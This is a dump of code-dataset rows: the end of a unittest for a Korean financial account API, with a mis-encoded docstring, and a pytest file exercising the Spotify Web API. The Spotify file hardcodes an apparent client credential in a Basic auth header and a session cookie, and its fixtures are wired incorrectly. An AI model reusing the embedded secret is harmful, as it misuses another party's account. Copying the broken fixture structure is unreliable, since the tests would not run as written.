์ปค๋ฅํฐ๋ ์์ด๋์ ์ฐ๋๋ ๊ธ์ต๊ธฐ๊ด (์ํ/์นด๋) ๋ฆฌ์คํธ ์กฐํ
:return:
"""
response_body = self.invoker.fetch_account_list(connected_id=self.connected_id)
self.assertEqual(response_body['result']['code'], 'CF-00000')
if __name__ == '__main__':
unittest.main()
| [
"esanzy87@gmail.com"
] | esanzy87@gmail.com |
c6b09b750eb78aec189548cc6ec9e8369cccd1d6 | 11910a7ffbc26b9c727bd79682d5edcf7c44de6f | /com/tests/test_api.py | 3600477c34814475cf4b574485d55ff314caebc7 | [] | no_license | AnbuHumbleFool/AutomationUtility | 6bf25c8f523befd8e856c3c6ce2eee5105a85916 | 1020f1b383bb51bcce52ff1fbd4730338a411f8f | refs/heads/master | 2023-04-01T19:50:15.014521 | 2023-03-25T11:21:09 | 2023-03-25T11:21:09 | 283,449,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,290 | py | import pytest
import json
import requests
import csv
# import pandas as pd
class WholeAPITest():
@pytest.fixture
def test_one(self):
# Fetch bearer token
# /.................................Test Case 1...................................../
url = 'https://accounts.spotify.com/api/token'
payload = {'grant_type': 'client_credentials'}
headers = {
'Authorization': 'Basic YzE0ZDBiMWFlMjlmNGY5Yjg2ZWNlOGZkMTNhNmYyMjk6NmIyYjBlZDMxNTA3NDYxZTk0ZjIxMzdhMzc5ODZhMjE=',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '__Host-device_id=AQD6B9_lD9MJcRtLUYurVItK60k_EK8KAX9UaG6hW4A80pSf46DQUQXuAn47_BqXOVCoTTdRy-nujG4FWVL4IwqAF2JCWf8HzPA; sp_tr=false'}
res = requests.post(url, data=payload, headers=headers)
print(res.content)
print(res.status_code)
# print(res.get('access_token'))
jsonResponse = res.json()
bearer_token = jsonResponse["access_token"]
print(bearer_token)
return bearer_token
@pytest.fixture
def test_two(self, bearer_token):
# Search for AR Rahman artist
# /.................................Test Case 2...................................../
url2 = 'https://api.spotify.com/v1/search?query=A.R.+Rahman&offset=0&limit=20&type=artist'
headers2 = {'Authorization': 'Bearer ' + bearer_token}
# payload2 = {'query': 'A.R.+Rahman','offset': '0', 'limit'}
res2 = requests.get(url2, headers=headers2
)
print(res2.content)
t2JsonResponse = res2.json()
# Response - Fetch Artist id
artist_id = t2JsonResponse["artists"]["items"][0]["id"]
print(artist_id)
return artist_id
# /.................................Test Case 3...................................../
# Search for his top tracks by using the artist id from the above response
@pytest.fixture
def test_three(self, artist_id, headers2):
url3 = 'https://api.spotify.com/v1/artists/' + artist_id + '/top-tracks?market=in'
res3 = requests.get(url3, headers= headers2)
print(res3.content)
t3JsonResponse = res3.json()
track_id = t3JsonResponse["tracks"][0]["id"]
print(track_id)
return track_id
# Fetch any one track from the list above and the respective artists/ artist for that track and store It in CSV/flat file
# Validation: Search for the track using the track id stored in CSV,
# /.................................Test Case 4...................................../
@pytest.fixture
def test_four(self, track_id, artist_id, headers2):
url4 = 'https://api.spotify.com/v1/tracks/' + track_id
res4 = requests.get(url4, headers=headers2)
print(res4.content)
t4JsonResponse = res4.json()
# Fetch Artist name
artist_name = t4JsonResponse["artists"][0]["name"]
print(artist_name)
# Validation: Search for the track using the track id stored in CSV
with open("C:/Users/DELL/Desktop/sample.json", "w") as outfile:
json.dump(t4JsonResponse, outfile)
with open('C:/Users/DELL/Desktop/sample.json') as json_file:
data = json.load(json_file)
print(data)
employee_data = data['artists']
# now we will open a file for writing
data_file = open('C:/Users/DELL/Desktop/data_file.csv', 'w')
# create the csv writer object
csv_writer = csv.writer(data_file)
# Counter variable used for writing
# headers to the CSV file
count = 0
for emp in employee_data:
if count == 0:
# Writing headers of CSV file
header = emp.keys()
csv_writer.writerow(header)
count += 1
# Writing data of CSV file
csv_writer.writerow(emp.values())
data_file.close()
# Validation: Search for the track using the track id stored in CSV
FILE_NAME = 'C:/Users/DELL/Desktop/data_file.csv'
with open(FILE_NAME, 'rt') as f:
data_excel = csv.reader(f)
for row in data_excel:
if artist_id in row:
print(row)
| [
"itanbarasan.gmail.com"
] | itanbarasan.gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.